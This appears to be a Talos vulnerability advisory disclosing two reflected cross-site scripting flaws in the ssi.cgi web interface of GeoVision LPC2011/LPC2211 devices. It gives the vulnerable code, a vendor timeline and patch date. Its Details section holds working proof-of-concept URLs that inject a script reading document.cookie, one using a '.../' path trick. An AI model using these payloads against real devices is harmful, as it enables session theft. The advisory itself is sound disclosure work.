Talos Vulnerability Report

TALOS-2026-2327

GeoVision LPC2011/LPC2211 Web Interface / ssi.cgi reflected cross-site scripting (XSS) vulnerabilities

June 15, 2026

CVE Number

CVE-2026-7371,CVE-2026-42366

Summary

Multiple exploitable reflected cross-site scripting (XSS) vulnerabilities exist in the Web Interface / ssi.cgi functionality of LPC2011/LPC2211 (version(s): 1.10). A specially crafted malicious url can lead to an arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.

Confirmed Vulnerable Versions

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LPC2011/LPC2211 (version(s): 1.10)

Product URLs

LPC2011/LPC2211 - https://www.geovision.com.tw/product/GV-LPC2011

CVSSv3 Score

7.4 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Details

CVE-2026-7371 - Reflected XXS via the error message for requesting non-existing page

The vulnerable code can be seen here:

  fd = (_IO_FILE *)fopen64(file_to_open, "r");
  if ( !fd )
  {
    printf(
      "<HTML><HEAD><TITLE>%s</TITLE></HEAD>\n"
      "<BODY><H2>%s</H2>\n"
      "The requested server-side-includes filename, %s,\n"
      "does not seem to exist.\n"
      "</BODY></HTML>\n",
      "404 Not Found",
      "404 Not Found",
      file_to_open);
    exit(1);
  }

Where file_to_open is a value extracted from the requested URL. The vulnerable code is triggered when attempting to open a page that doesn’t exist. For example:

Request:
http://10.10.0.102/ssi.cgi/%3Cscript%3Ealert(document.cookie)%3C/script%3E


Response:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H2>404 Not Found</H2>
The requested server-side-includes filename, /www/<script>alert(document.cookie)</script>,
does not seem to exist.
</BODY></HTML>

CVE-2026-42366 - Reflected XXS via the error message for invalid character in URL

The vulnerable code can be seen here:

  if ( strstr(file_to_open, "../")
    || g_CGI_PATTERN && match_pattern((char *)g_CGI_PATTERN, (unsigned __int8 *)file_to_open)
    || match_pattern("**.php", (unsigned __int8 *)file_to_open) )
  {
    printf(
      "<HR><H2>%s</H2>\nThe filename requested in the %s %s=%s directive\nmay not be fetched.\n<HR>\n",
      "Not Permitted",
      "initial",
      "PATH_TRANSLATED",
      file_to_open);
    exit(1);
  }

Where file_to_open is a value extracted from the requested URL. To reach this vulnerable code, the requesed URL needs to contain any of the forbidden characters defined in the if statement, in particular ../.

For example, by requesting a URL with .../ in it (the extra . used to avoid path normalization) we can see the following:

Request:
curl http://10.10.0.102/ssi.cgi/a/.../%3Cscript%3Ealert(document.cookie)%3C/script%3E


Response:
<HR><H2>Not Permitted</H2>
The filename requested in the initial PATH_TRANSLATED=/www/a/.../<script>alert(document.cookie)</script> directive
may not be fetched.
<HR>

Timeline

2026-02-17 - Initial Vendor Contact
2026-02-24 - Vendor Disclosure
2026-04-14 - Vendor Patch Release
2026-06-15 - Public Release

Credit

Philippe Laulheret of Cisco Talos

TALOS-2026-2369

Intelligence Center

Vulnerability Research

Incident Response

Security Resources

Media

Company